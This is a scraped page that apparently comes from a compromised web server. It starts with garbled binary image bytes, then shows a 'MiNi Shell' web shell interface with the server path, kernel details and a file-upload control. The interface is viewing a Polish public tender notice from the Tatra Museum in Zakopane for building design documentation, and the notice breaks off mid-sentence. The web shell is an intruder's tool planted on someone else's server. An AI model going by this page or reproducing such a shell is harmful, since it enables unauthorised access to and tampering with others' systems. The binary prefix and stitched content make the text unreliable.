JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250512/0022713201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji wykonawczej, w skład której wchodzi: projekt wykonawczy, specyfikacja techniczna wykonania<br/>i odbioru robót budowlanych, przedmiar robót, kosztorys inwestorski, in. opracowania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM TATRZAŃSKIE IM.DRA TYTUSA CHAŁUBIŃSKIEGO W ZAKOPANEM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000278385</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krupówki 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakopane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@muzeumtatrzanskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://muzeumtatrzanskie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji wykonawczej, w skład której wchodzi: projekt wykonawczy, specyfikacja techniczna wykonania<br/>i odbioru robót budowlanych, przedmiar robót, kosztorys inwestorski, in. opracowania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15bc4f55-2ba3-47a3-88ef-7cae5b471f11</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00227132</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00091539/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Opracowanie dokumentacji wykonawczej w skład której wchodzi: projekt wykonawczy, specyfikacja techniczna wykonania i odbioru robót budowlanych, przedmiar robót, kosztorys inwestorski i in. opracowania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-15bc4f55-2ba3-47a3-88ef-7cae5b471f11 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 1. W związku z tym, że część dokumentów wymienionych w Rozdziale III ust. 3 SWZ, stanowiących załącznik nr 1 do OPZ<br/>zawiera informacje w szczególności techniczne dla których Zamawiający wymaga zachowania ich poufności, Zamawiający<br/>na podstawie art. 18 ust. 4 p.z.p. nie będzie udostępniać ich na stronie internetowej (nie dotyczy dokumentu „Opisu<br/>przedmiotu zamówienia” – Załącznika nr 1 do SWZ).<br/>2. Wykonawca chcąc uzyskać powyższe dokumenty zobowiązany jest zwrócić się do Zamawiającego z wnioskiem o<br/>udostępnienie tego załącznika oraz przesłać podpisany przez upoważnioną do reprezentacji Wykonawcy osobę (osoby)<br/>oświadczenie, którego wzór stanowi załącznik nr 10 do SWZ. Wniosek oraz oświadczenie, o którym mowa w zdaniu<br/>poprzednim należy przesłać za pośrednictwem email: zp@muzeumtatrzanskie.pl.<br/>3. Udostępnienie powyższych dokumentów skompresowanych do pliku „zip”, nastąpi drogą elektroniczną z hasłem lub<br/>zostaną nagrane w siedzibie Zamawiającego na nośnik dostarczony przez Wykonawcę niezwłocznie po złożeniu przez<br/>Wykonawcę ww. oświadczenia. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2.Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3.Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: Karolinę Gacek, adres e-mail:<br/>zp@muzeumtatrzanskie.pl, tel.: 570 776 222<br/>4.Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-15bc4f55-2ba3-47a3-88ef-7cae5b471f11<br/>5.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>6.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>7.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>8.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania<br/>z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9.W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy eZamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zp@muzeumtatrzanskie.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/>11. Pozostałe wymagania w zakresie komunikacji zostały wskazane w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Muzeum Tatrzańskie im. Dra Tytusa Chałubińskiego w Zakopanem.<br/>2. Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@muzeumtatrzanskie.pl; telefon 799-186-893.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 p.z.p.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych p.z.p., związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>8. Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą p.z.p. oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania<br/>o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub<br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne<br/>z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest<br/>Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ADM.263-3/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej (zwanej dalej: „dokumentacją wykonawczą”), w<br/>skład której wchodzi w szczególności:<br/>1) projekt wykonawczy,<br/>2) specyfikacja techniczna wykonania i odbioru robót budowlanych,<br/>3) przedmiar robót,<br/>4) kosztorys inwestorski,<br/>5) dodatkowe projekty i inne opracowania techniczne wymienione w opisie przedmiotu zamówienia, stanowiącym załącznik<br/>nr 1 do specyfikacji warunków zamówienia.<br/>2. Dokumentacja wykonawcza powinna stanowić uzupełnienie i uszczegółowienie posiadanej przez Zamawiającego<br/>dokumentacji projektowej tj. projektu architektoniczno-budowlanego, projektu zagospodarowania terenu i projektu<br/>technicznego, stanowiącej załącznik nr 1 do OPZ.<br/>3. Dokumentacja wykonawcza, w tym jej poszczególne części służyć będzie następującym celom:<br/>a) opisowi przedmiotu zamówienia do postępowania udzielenie zamówienia publicznego na roboty budowlane, które będzie<br/>udzielone w oparciu o ustawę Pzp oraz ustaleniu wartości zamówienia na roboty budowlane Obiektu zgodnie z ww. ustawą,<br/>b) realizacji robót budowlanych.<br/>4. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu</p> <p class="mb-0">71420000-8 - Architektoniczne usługi zagospodarowania terenu</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">79930000-2 - Specjalne usługi projektowe</p> <p class="mb-0">79932000-6 - Usługi projektowania wnętrz</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę, spośród ważnych ofert złożonych<br/>w postępowaniu, na podstawie kryteriów oceny ofert określonych w SWZ.<br/>2. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% =<br/>1pkt. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą sumaryczną liczbę punktów w skali 100 punktowej<br/>obliczonej wg. następującego wzoru:<br/>X = C + D<br/>gdzie:<br/>X – łączna ilość punktów, którą otrzyma oferta danego Wykonawcy<br/>C – ilość punktów którą otrzyma oferta danego Wykonawcy w kryterium „Cena (C)”<br/>D – ilość punktów którą otrzyma oferta danego Wykonawcy w kryterium „Doświadczenie osób skierowanych do realizacji zamówienia<br/>(D)”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>zdolności technicznej lub zawodowej<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>w tym okresie - wykonali 2 (dwie) usługi, których przedmiotem było opracowanie wielobranżowej dokumentacji projektowej<br/>(w szczególności obejmującej: projekt techniczny, lub/i projekt wykonawczy, przedmiar, kosztorys inwestorski, specyfikacja<br/>techniczna wykonania i odbioru robót budowlanych) remontu lub przebudowy budynku lub zespołu budynków, w tym jedna z<br/>powyższych dokumentacji projektowych była wykonana dla budynku wpisanego do rejestru zabytków lub Gminnej Ewidencji<br/>Zabytków.<br/>b) dysponuje lub będzie dysponował, co najmniej następującymi osobami:<br/>− jedną osobą z uprawnieniami do projektowania w specjalności architektonicznej bez ograniczeń lub odpowiadającymi im<br/>równoważnymi uprawnieniami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>posiadającą min. 18-miesięczne doświadczenie, która wykonała lub brała udział w wykonaniu co najmniej jednej<br/>wielobranżowej dokumentacji projektowej (w skład której wchodził w szczególności: projekt techniczny lub/i projekt<br/>wykonawczy, przedmiar, kosztorys, specyfikacja techniczna wykonania i odbioru robót budowlanych) dotyczącej<br/>przebudowy lub remontu budynku wpisanego do rejestru zabytków lub Gminnej Ewidencji Zabytków,<br/>− jedną osobą z uprawnieniami do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, posiadającą min. 18-miesięczne doświadczenie, która wykonała lub brała udział w wykonaniu co najmniej jednej<br/>wielobranżowej dokumentacji projektowej (w skład której wchodził w szczególności: projekt techniczny lub/i projekt<br/>wykonawczy, przedmiar, kosztorys, specyfikacja techniczna wykonania i odbioru robót budowlanych) dotyczącej<br/>przebudowy lub remontu budynku wpisanego do rejestru zabytków lub Gminnej Ewidencji Zabytków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki<br/>dowodowe na potwierdzenie niepodlegania wykluczeniu:<br/>a) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 p.z.p. w zakresie odnoszącym się do braku podstaw do wykluczenia Wykonawcy z postępowania.<br/>Wzór oświadczenia stanowi załącznik nr 5 do SWZ,<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie spełnienia warunków udziału w postępowaniu:<br/>a) wykaz usług, wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich przedmiotu, dat wykonania oraz załączeniem dowodów określających czy usługi zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie Wykonawcy – wzór wykazu usług stanowi załącznik nr 7 do SWZ.<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich uprawnień<br/>i doświadczenia potwierdzających spełnienie warunku uczestnictwa, o którym mowa w Rozdziale VIII ust. 2 pkt 4. lit. 